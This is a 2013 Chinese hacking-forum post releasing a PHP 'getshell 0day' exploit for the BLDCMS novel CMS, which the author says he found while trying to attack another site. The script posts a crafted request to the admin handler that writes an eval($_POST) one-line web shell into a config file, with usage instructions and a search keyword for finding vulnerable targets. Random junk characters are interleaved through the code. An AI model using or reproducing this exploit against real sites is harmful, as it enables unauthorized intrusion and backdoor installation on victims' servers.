中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
) H" }& X/ O, I* Y" t) I
7 V5 J$ t4 [3 ?" M0 j7 o
; r! n+ Y; n: ]/ ^ J2 ~/ U
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
6 Q1 k' ^. g" ~- e6 R/ T
" N `1 S: w& k' f' S4 {& p- R
既然都有人发了 我就把我之前写好的EXP放出来吧
8 L+ i( g" T$ C }
8 X7 r4 q8 C* n$ _. k
view source print?01.php;">
$ u6 e- V8 x& J8 H4 d h
02.<!--?php
/ F" d1 @& o1 M( E
03.echo "-------------------------------------------------------------------
3 d. t# ]7 m* B( P8 g( [( o
04.
9 u' G2 ]" e- d) ?# \( r' c- ^. l
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
1 P4 u9 I% W4 e! \8 u* D% I
06.
+ Y% |$ a/ r9 l! J1 p
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
0 i/ }! b4 L8 h K! N( m! u
08.
" ^) `+ r% I7 Z
09.QQ:981009941\r\n 2013.3.21\r\n
o. ]! J! `& R, ?
10.
. d, |8 g' j8 G
11.
! F3 V8 I2 H3 A c7 N- X1 a+ X' u9 x
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
1 b" X6 n/ `5 A) M) a" |
13.
2 s4 c8 l3 Z/ ^5 L
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
: ]- L5 d, {4 X b8 g. C. r
15.
) ?: A1 d0 A8 o" P% v
16.--------------------------------------------------------------------\r\n";
3 M0 S' B. P8 k- S1 n' \5 U
17.$url=$argv[1];
8 q% T8 P" ?$ i) O. z
18.$dir=$argv[2];
' g" \& x' c& ^& w+ t, c' Y
19.$pass=$argv[3];
2 T9 ^ i- x" x+ R4 `3 I* W" i
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
) h9 H2 h0 |9 @. ?5 x& y
21.if (emptyempty($pass)||emptyempty($url))
7 Z& y* W2 _9 k# E8 g
22.{exit("请输入参数");}
. E9 Y0 X+ z4 [+ b
23.else
; [# [" X H0 g" ?% A$ D7 e
24.{
) Y3 j8 @3 |4 S9 P1 @% t6 k6 C! Q- a% S
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
4 j4 ], ]/ W( M b9 y
26.
' s* A, u+ h' _% `- y. m
27.al;
! |: G0 ~& i4 t
28.$length = strlen($fuckdata);
t) t! l0 A, x
29.function getshell($url,$pass)
; q8 I' k9 {# {4 g Y7 z
30.{
, o* |. W2 R- [1 ?6 @
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
|0 s# H$ p* V5 ?# i, j0 D0 {
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
+ U0 F0 ` r3 G7 `" C
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
8 N" M/ Q$ v4 Q5 v; f# B0 d
34.$header .= "User-Agent: MSIE\r\n";
8 x) A% r. Z/ G0 G0 X9 G
35.$header .= "Host:".$url."\r\n";
/ @! L6 X1 \9 |
36.$header .= "Content-Length: ".$length."\r\n";
( Z4 {. m# R: e- p$ Y: D0 T6 I8 h
37.$header .= "Connection: Close\r\n";
" ^8 i3 O3 I; o5 |4 {8 Z, f
38.$header .="\r\n";
7 [) v" x. k( r' V
39.$header .= $fuckdata."\r\n\r\n";
0 }. o3 y; B- c( P
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
7 X3 B- p8 x1 y& m$ ^- C7 S G
41.if (!$fp)
9 y5 F& K! \$ G
42.{
! f6 i' b; D5 ?' p
43.exit ("利用失败:请检查指定目标是否能正常打开");
% {2 }- h: \) { o! `0 |- d4 p* W
44.}
$ H1 Q) d& ~6 [+ g& D- q/ ?
45.else{ if (!fputs($fp,$header))
2 _5 b( J" E9 Q' O
46.{exit ("利用失败");}
& I0 p; q2 E z0 @2 H
47.else
: s4 M4 \* T2 Q- R' P4 `2 Q/ ?
48.{
; B9 f' b Q# _: S
49.$receive = '';
$ N+ `% P% X8 p5 c; I5 X& D; n
50.while (!feof($fp)) {
3 x' B7 e7 K$ D1 o: ^: k3 l
51.$receive .= @fgets($fp, 1000);
7 B* X- C; [. i7 ]! l
52.}
, l/ c( Z n. C- d
53.@fclose($fp);
! `. X# N9 i% {+ d9 {- ?
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
! J/ U) N9 O1 K# u& f1 }' e
55.
3 \; \; m* W3 i6 k' s: Y
56.GPC是否=off)";
2 }8 X/ d( ? x6 U& o# E/ r- Z4 J
57.}}
/ z. J+ y- s' m. y, t
58.}
3 c9 Z% Z0 M+ m
59.}
! r, h8 }" U x, A" d- M7 {
60.getshell($url,$pass);
2 z- b0 B8 D* H, u: z( n# n
61.?-->
: k& }2 b8 A1 h5 u5 Y1 y: X) V2 X/ i
+ X3 @5 r5 @2 e% u8 V& }' R
5 T% i+ a4 ?7 e- x5 t6 e- ^: j9 l
% `) r( n3 }, J% L
by 数据流
/ y( i) V2 }; f z/ j
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2